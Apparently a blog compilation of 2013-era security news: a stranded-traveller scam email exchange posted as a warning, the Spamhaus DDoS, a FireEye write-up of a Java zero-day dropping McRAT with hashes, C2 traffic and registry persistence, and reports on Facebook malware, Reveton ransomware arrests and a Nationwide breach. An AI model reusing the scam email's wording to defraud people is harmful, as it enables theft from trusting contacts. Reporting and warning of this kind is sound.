The social networking method of hacking !!!!

Morning,

 Just hoping this email reaches you well, I'm sorry for this emergency and for not informing you about my urgent trip to United Kingdom but I just have to let you know my present predicament. Everything was fine until I was attacked on my way back to the hotel, I wasn't hurt but I lost my money, bank cards, mobile phone and my bag in the course of this attack. I immediately contacted my bank in order to block my cards and also made a report at the nearest police station. I've been to the embassy and they are helping me with my documentation so i can fly out but I'm urgently in need of some money to pay for my hotel bills and my flight ticket home, will definitely REFUND as soon as back home .

Kindly let me know if you would be able to help me out so I can forward you the details required for a wire transfer.

Waiting to hear back from you...

With kind regards.

JGD.

Vilas

=====================

Sandeep Erat <sandeeperat@gmail.com>	Jul 26 (7 days ago)
to vilaspatki

Jgd!

What is this?

What u wanna me to do!

Regards,

Sandeep

vilas patki	Jul 26 (7 days ago)
to me

I'm so glad you replied back, I have nothing left on me right now, all I need you to do is to have it wired to my name through Western Union Money Transfer and I will pick it up here, you have my word and I can make it up to you, I promise to pay you back as soon as I get back home.

Here's my info below

Name: vilas patki
Location: 456B  Brecon Road, Abervagenny, Gwent,
              Wales, NP7  5UH
               United Kingdom.
Amount : 1,880 GPB

As soon as it has been done, kindly get back to me with the transfer details (MTCN #) given to you at the Western Union Money Transfer Outlet.

Waiting to hear back from you...

With kind regards.

JGD.

Vilas

=====================

Dear Vilas,
Jgd!

Thank you for the details! And so sorry for the situation!

But I do not have this much money!

Please let me know how to go about!
 

SO GUYS BE CAREFUL !!!!

The so called hacker can come in any form !!!!

Love 

Sandeep

March 27, 2013 7:40 pm

Hackers mount widespread cyber attack

By Bede McCarthy in London and Richard Waters in San Francisco

Hackers have hit a European anti-spam group with a cyber attack so large that experts say it could slow down the internet itself.
The original target was Spamhaus, which said it had been subject to large-scale distributed denial of service (DDoS) attacks for the past week. Such attacks overwhelm servers by bombarding them with spurious requests simultaneously from computers all over the internet.
According to security companies monitoring the attack, it has risen in scale from 10 gigabits per second of data to 300Gbps, making it one of the largest of its kind and about six times the size of most such incidents.
Cloudflare, a security company hired by Spamhaus to fight off the bombardment, said the attack ceased on March 21 but resumed the next day with increased power, targeting Cloudflare’s network providers in an effort to neutralise the defence.
The company said the result was that the attack moved up the chain to the so-called Tier 1 providers, who service the internet with raw bandwidth. In effect, all internet users were sharing the increased load.
“While we don’t have direct visibility into the traffic loads they saw, we have been told by one major Tier 1 provider that they saw more than 300Gbps of attack traffic related to this attack. That would make this attack one of the largest ever reported,” Cloudflare said.
Spamhaus’ volunteers maintain a list of internet addresses known to be used for spam, enabling users of its service to filter out large amounts of junk or infected email. As a result it has many enemies, and has accused one such blocked site of colluding with online criminals in eastern Europe and Russia to launch the attack.
However, the attack has failed to bring the address-blocking service offline. ““We’re up – they haven’t been able to knock us down. Our engineers are doing an immense job in keeping it up – this sort of attack would take down pretty much anything else,” Steve Linford, chief executive for Spamhaus, told the BBC in London.
Raj Samani, McAfee’s chief technology officer in Europe, said an attack of this scale was likely to affect all internet users, from consumers to small and large businesses. “We are seeing an increase in volume and sophistication of these types of attacks stemming from all parts of the world,” he said.
Kaspersky Lab, another security company, said that owing to the nature of the internet the attack would probably impede normal web services for users of other sites, not just Spamhaus. Users may experience a slow network or total unavailability of certain websites.
Although many users have experienced delays in bandwidth-hungry services such as Netflix, Thinkbroadband, a broadband consultancy in the UK, said its tests showed no evidence that internet speeds had been slower.

Copyright The Financial Times Limited 2013. 

YAJ0: Yet Another Java Zero-Day

YAJ0: Yet Another Java Zero-Day

Through our Malware Protection Cloud (MPC), we detected a brand new Java zero-day vulnerability that was used to attack multiple customers. Specifically, we observed successful exploitation against browsers that have Java v1.6 Update 41 and Java v1.7 Update 15 installed.
Not like other popular Java vulnerabilities in which security manager can be disabled easily, this vulnerability leads to arbitrary memory read and write in JVM process. After triggering the vulnerability, exploit is looking for the memory which holds JVM internal data structure like if security manager is enabled or not, and then overwrites the chunk of memory as zero. Upon successful exploitation, it will download a McRAT executable (MD5: b6c8ede9e2153f2a1e650dfa05b59b99 as svchost.jpg) from same server hosting the JAR file and then execute it.

Figure 1. Example HTTP GET of the McRAT after the browser is successfully exploited, prior to the endpoint becoming fully compromised.

The exploit is not very reliable, as it tries to overwrite a big chunk of memory. As a result, in most cases, upon exploitation, we can still see the payload downloading, but it fails to execute and yields a JVM crash. When the McRAT successfully installs in the compromised endpoint as an EXE (MD5: 4d519bf53a8217adc4c15d15f0815993), it generates the following HTTP command and control traffic:
POST /59788582 HTTP/1.0
Content-Length: 44
Accept: text/html,application/xhtml+xml,application/xml,*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 110.XXX.55.187
Pragma: no-cache

4PdWXOD3Vlzg91Zc4PdWXOD3Vlzg91Zc4PdWXMP1RXw.
McRAT persists by writing a copy of itself as a DLL to (C:\Documents and Settings\admin\AppMgmt.dll) and performing the following registry modifications:

\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = C:\Documents and Settings\admin\AppMgmt.dll
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = %SystemRoot%\System32\appmgmts.dll
This post was intended to serve as a warning to the general public. We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in your browser until a patch has been released; alternatively, set your Java security settings to "High" and do not execute any unknown Java applets outside of your organization.
We will continue to update this blog as new information about this threat is found. FireEye would like to acknowledge and thank Hermes Bojaxhi and his team at CyberESI for their assistance in confirming this Java zero-day vulnerability.

---

This blog was written by FireEye researchers Darien Kindlund and Yichong Lin.
Update: Oracle assigned CVE-2013-1493 on this vulnerability.

TrackBack

TrackBack URL for this entry:
http://www.typepad.com/services/trackback/6a00d835018afd53ef017c372f3a56970b
Listed below are links to weblogs that reference YAJ0: Yet Another Java Zero-Day:

Facebook employees hit with malware

Facebook Inc confirmed on Friday that laptops used by its employees had been compromised by malware when staff visited the infected website of a mobile software developer last month.


The incursion was detected when Facebook's network monitoring personnel unearthed a suspect domain and traced it to an employee's computer. The malware discovered on the machine made use of a known vulnerability within Oracle's Java runtime platform. The hole was resolved with a patch released by Oracle on 1 February.


Facebook stressed there was no evidence user data had been accessed, but Bloomberg reported yesterday that the social media company is working with the US Federal Bureau of Investigation (FBI) in an effort to determine the source of the attack.

"As soon as we discovered the presence of the malware, we remediated all infected machines, informed law enforcement, and began a significant investigation that continues to this day," Facebook said.


Earlier this month Twitter revealed it had been subject to an attack and said that as many as 250,000 accounts may have been accessed, including the personal data attached to them. Other attacks on the websites of prominent newspapers The New York Times, The Washington Post, and The Wall Street Journal were attributed to Chinese hackers.

Multi-million euro cybercrime gang leader arrested in UAE

Spanish police have arrested a gang of cyber criminals who were extorting as much as one million euros a year ($1.3m) using ransomware.

The leader of the gang, a 27-year old Russian, was arrested while on holiday in Dubai in December. Ten other gang members six Russians, two Ukrainians and two Georgians, who were apparently responsible for laundering proceeds of the scam, were arrested in Spain.

The cyber crime used a malware that was first seen in 2005, although the gang adapted it to target end users in 30 countries. The ransomware, known as Reveton, was tailored to look like a message from different police authorities, which would freeze the user PC until they paid a fine of 100 euros for accessing file sharing, child pornography or terrorist sites.

The money was laundered through PaySafeCard/UKash vouchers, with the ransom paid in the US, transferred to the gang in Spain, and laundered and the proceeds wired to Russia.

Trend Micro's eCrimes unit was heavily involved in the investigation, which the company warns is ongoing, and that the Reveton malware is still in the wild.

Hacker floods Dubai 999 service !!!

Dubai Police today warned the public against clicking on an infected Web link, which was triggering 999 calls and jamming the emergency line, 7Days reported.


The announcement, made through Twitter appealed to online visitors not to click the link that was claiming to lead to a close-up picture of the sun, and condemned the irresponsible act as having endangered lives. It is not clear from the warning how the infected link was propagated.


"We have received numerous calls because of this link," Brigadier Omar Al Shamsi, director of Dubai Police command and control, told Arabic daily Al Bayan.

"They are really very disturbing and annoying as they put great pressure on the emergency operator. It is not the first time such irresponsible actions [have been] taken by irresponsible persons. Previously, we have succeeded in identifying those persons and presented them to court on charges of disturbing authorities."


Al Shamsi was referring to the October 2012 case of an Emirati man who sent a link through the Blackberry network that he claimed was UAE vocalist Shamma Hamdan's phone number. The number was linked to the emergency 999 service and inundated the line with calls from Shamma fans before police publicised the problem, again through Twitter.

Source: http://www.itp.net/592050-hacker-floods-dubai-999-service?tab=article#.UQphRPJBCQA

Nationwide Insurance data breach affects 1.1 million people

Ben Weitzenkorn , TechNewsDaily

NBC News 

Nationwide has notified customers and those who contacted the insurance company for information about the security breach.

Nationwide Mutual Insurance Company fell victim to hackers in October, affecting an estimated 1.1 million individuals, including non-customers who had sought insurance quotations, the company told customers Thursday.
Nationwide's subsidiary Allied Insurance was also affected.
Thieves made off with names and corresponding Social Security numbers, driver's license numbers and birth dates after thieves broke into the company network.

Nationwide reported the incident to authorities immediately, but did not inform consumers until now.
"We are not aware of any misuse of consumers' information at this time," the company said in a statement.
A patchwork of news reports alluded to the scope of the breach, with a combined 120,000 individuals known to be affected across Iowa, Florida and Ohio, Kaspersky's Threatpost blog reported. It wasn't until this week that the full extent of the breach became known.
Nationwide is in the process of informing its affected customers, but nonclients who sought quotes should be extra vigilant in monitoring their accounts' activity.
Nationwide said it would supply victims with one year of credit monitoring services and up to $1 million for identity theft protection. It also posted a FAQ page to answer customers' questions.

• Why State Data-Breach Laws May Not Protect You
• Hey Stupid: Why Internet Hacking Is Your Fault
• 10 Best Identity Theft Protection Services

Copyright 2012 TechNewsDaily, a TechMediaNetwork company. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.